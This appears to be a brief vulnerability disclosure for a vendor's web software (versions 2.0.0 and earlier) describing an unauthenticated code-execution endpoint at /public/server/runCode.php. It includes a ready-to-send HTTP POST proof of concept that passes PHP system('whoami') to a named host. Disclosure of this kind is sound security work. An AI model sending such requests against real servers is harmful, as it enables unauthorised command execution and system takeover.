BUG_Author:
glzjin
Affected version:
≤2.0.0
Vendor:
https://www.kaiyuantong.cn/
Software:
Vulnerability File:
- /public/server/runCode.php
Description:
1.In file /public/server/runCode.php we could see a endpoint to retrive code and execute them, and these is pre-auth endpoint.
2. So we may send this request to this endpoint to execute command.
POST /server/runCode.php HTTP/1.1
Host: ect.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
code=%3C%3Fphp%20system('whoami')%3B%20%3F%3E
